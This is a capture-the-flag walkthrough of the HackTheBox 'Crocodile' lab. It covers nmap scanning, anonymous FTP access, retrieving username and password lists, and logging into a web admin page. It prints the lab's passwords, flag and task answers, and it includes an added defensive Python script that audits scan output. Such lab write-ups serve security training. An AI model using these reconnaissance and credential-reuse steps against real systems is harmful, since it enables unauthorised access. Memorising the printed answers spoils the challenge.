Crocodile is a really awesome challenge by HackTheBox for practising hacking skills. In today’s writeup we are going to solve this challenge.
First of all, fire up your terminal and scan for services running on the machine:
wesecure1337@kali:~$ nmap -sC 10.129.97.148
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-28 16:53 IST
Nmap scan report for 10.129.97.148
Host is up (0.48s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE
21/tcp open ftp
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 ftp ftp 33 Jun 08 2021 allowed.userlist
|_-rw-r--r-- 1 ftp ftp 62 Apr 20 2021 allowed.userlist.passwd
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.10.16.80
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
80/tcp open http
|_http-title: Smash - Bootstrap Business Template
Nmap done: 1 IP address (1 host up) scanned in 68.81 seconds
Here -sC is used to specify that we want to scan this server for known vulnerabilities.
In your terminal, type nmap and the help page of nmap opens:
wesecure1337@kali:~$ nmap
...
-sC: equivalent to --script=default
...
-sC specifies the default scripts.
From the scan results, our useful information is:
PORT STATE SERVICE
21/tcp open ftp
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 ftp ftp 33 Jun 08 2021 allowed.userlist
|_-rw-r--r-- 1 ftp ftp 62 Apr 20 2021 allowed.userlist.passwd
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.10.16.80
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
80/tcp open http
|_http-title: Smash - Bootstrap Business Template
We can clearly see that we can log in to ftp using anonymous as the username.
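The same scan output can be read from the defender's side when reviewing your own hosts. The following is an added example, not part of the original writeup: it parses the text of an nmap -sC run and reports anonymous FTP, credential-looking files in the anonymous root, and plain-text connections. The function name, severity labels and filename patterns are assumptions chosen for illustration, and the sample input is constructed from the output shown above.

```python
import re

# Constructed sample: the relevant part of the `nmap -sC` output shown above.
SAMPLE_SCAN = """\
PORT STATE SERVICE
21/tcp open ftp
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 ftp ftp 33 Jun 08 2021 allowed.userlist
|_-rw-r--r-- 1 ftp ftp 62 Apr 20 2021 allowed.userlist.passwd
| ftp-syst:
| Control connection is plain text
| Data connections will be plain text
80/tcp open http
|_http-title: Smash - Bootstrap Business Template
"""

PORT_RE = re.compile(r"^(\d+)/tcp\s+open\s+(\S+)")
# ls-style line printed by ftp-anon: mode, links, owner, group, size, date, name
LISTING_RE = re.compile(r"^\|_?\s*([-d][rwx-]{9})\s+\d+\s+\S+\s+\S+\s+(\d+)\s+\w{3}\s+\d+\s+\S+\s+(.+)$")
# Assumption: name fragments that suggest credential material (tune per environment)
SENSITIVE_RE = re.compile(r"passw|userlist|shadow|cred|secret|\.key$|id_rsa", re.I)

def audit_scan(text):
    """Return a list of (port, severity, message) findings from nmap -sC text."""
    findings, port, anon = [], None, False
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            port, anon = int(m.group(1)), False  # new port section starts
            continue
        if port is None or not line.startswith("|"):
            continue  # only script output lines are of interest
        if "Anonymous FTP login allowed" in line:
            anon = True
            findings.append((port, "high", "anonymous FTP login is enabled"))
        elif "connection" in line and "plain text" in line:
            findings.append((port, "medium", line.lstrip("|_ ").strip()))
        elif anon and (f := LISTING_RE.match(line)):
            mode, size, name = f.group(1), int(f.group(2)), f.group(3)
            # mode[7] is the "other" read bit: the file is readable by everyone
            if mode[7] == "r" and SENSITIVE_RE.search(name):
                findings.append((port, "high", f"world-readable {name} ({size} bytes) in anonymous root"))
    return findings

if __name__ == "__main__":
    for port, sev, msg in audit_scan(SAMPLE_SCAN):
        print(f"{port}/tcp [{sev}] {msg}")
```

On a vsftpd server the usual fix for the first finding is anonymous_enable=NO in vsftpd.conf, and in any case credential files should never sit in a directory the FTP service exposes.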
Let’s solve the Tasks
TASK 1: What nmap scanning switch employs the use of default scripts during a scan?
-sC
Let’s scan for version information on the ftp server:
wesecure1337@kali:~$ nmap -sV -p21 10.129.97.148
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-28 17:01 IST
Nmap scan report for 10.129.97.148
Host is up (0.27s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
Service Info: OS: Unix
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1.78 seconds
This brings us to
TASK 2: What service version is found to be running on port 21?
vsftpd 3.0.3
Now let’s log in to the ftp server:
wesecure1337@kali:~$ ftp 10.129.97.148
Connected to 10.129.97.148.
220 (vsFTPd 3.0.3)
Name (10.129.97.148:wesecure1337): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
Finally, we are logged into the ftp server.
TASK 3: What FTP code is returned to us for the "Anonymous FTP login allowed" message?
230
Now we are going to explore the ftp server:
ftp> ls
229 Entering Extended Passive Mode (|||45302|)
150 Here comes the directory listing.
-rw-r--r-- 1 ftp ftp 33 Jun 08 2021 allowed.userlist
-rw-r--r-- 1 ftp ftp 62 Apr 20 2021 allowed.userlist.passwd
226 Directory send OK.
ftp> get allowed.userlist
local: allowed.userlist remote: allowed.userlist
229 Entering Extended Passive Mode (|||41011|)
150 Opening BINARY mode data connection for allowed.userlist (33 bytes).
100% |***************************************| 33 0.04 KiB/s 00:00 ETA
226 Transfer complete.
33 bytes received in 00:01 (0.02 KiB/s)
ftp> get allowed.userlist.passwd
local: allowed.userlist.passwd remote: allowed.userlist.passwd
229 Entering Extended Passive Mode (|||42792|)
150 Opening BINARY mode data connection for allowed.userlist.passwd (62 bytes).
100% |***************************************| 62 0.09 KiB/s 00:00 ETA
226 Transfer complete.
62 bytes received in 00:01 (0.05 KiB/s)
ftp>
The get command is used to download files from the ftp server to our local machine.
TASK 4: What command can we use to download the files we find on the FTP server?
get
Now we have two files, viz. allowed.userlist and allowed.userlist.passwd. Come back to your main machine and check for the files:
ftp> exit
wecesure1337@kali:~$ ls
allowed.userlist
allowed.userlist.passwd
wecesure1337@kali:~$ cat allowed.userlist
aron
pwnmeow
egotisticalsw
admin
wecesure1337@kali:~$ cat allowed.userlist.passwd
root
Supersecretpassword1
@BaASD&9032123sADS
rKXM59ESxesUFHAd
Seeing the files brings us to
TASK 5: What is one of the higher-privilege sounding usernames in the list we retrieved?
admin
Go to your terminal and follow the steps:
wesecure1337@kali:~$ nmap -sV -p80 10.129.97.148
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-28 17:18 IST
Nmap scan report for 10.129.97.148
Host is up (0.20s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.63 seconds
From the result we conclude that
TASK 6: What version of Apache HTTP Server is running on the target host?
2.4.41
Wappalyzer is a tool which can be installed as a browser plugin for analysing websites.
TASK 7: What is the name of a handy web site analysis plug-in we can install in our browser?
Wappalyzer
From the help menu of gobuster we know that -x is used to specify the file types to look for.
TASK 8: What switch can we use with gobuster to specify we are looking for specific filetypes?
-x
By using gobuster we have found a directory login.php.
TASK 9: What file have we found that can provide us a foothold on the target?
login.php
So let’s navigate to it.
Now log in with username admin and password rKXM59ESxesUFHAd, which we retrieved from the ftp server.
And finally we have successfully found the flag for this challenge.
SUBMIT FLAG
Submit root flag
c7110277ac44d78b6a9fff2232434d16
Voila!!! We have successfully solved the Crocodile Starting Point Challenge by HackTheBox. If you really enjoyed reading the Writeup [Walkthrough], then do check out our other articles.
Let’s get connected
Twitter: proton_sec
GitHub: proton-sec
LinkedIn: protonsec
Thanks for Reading!!!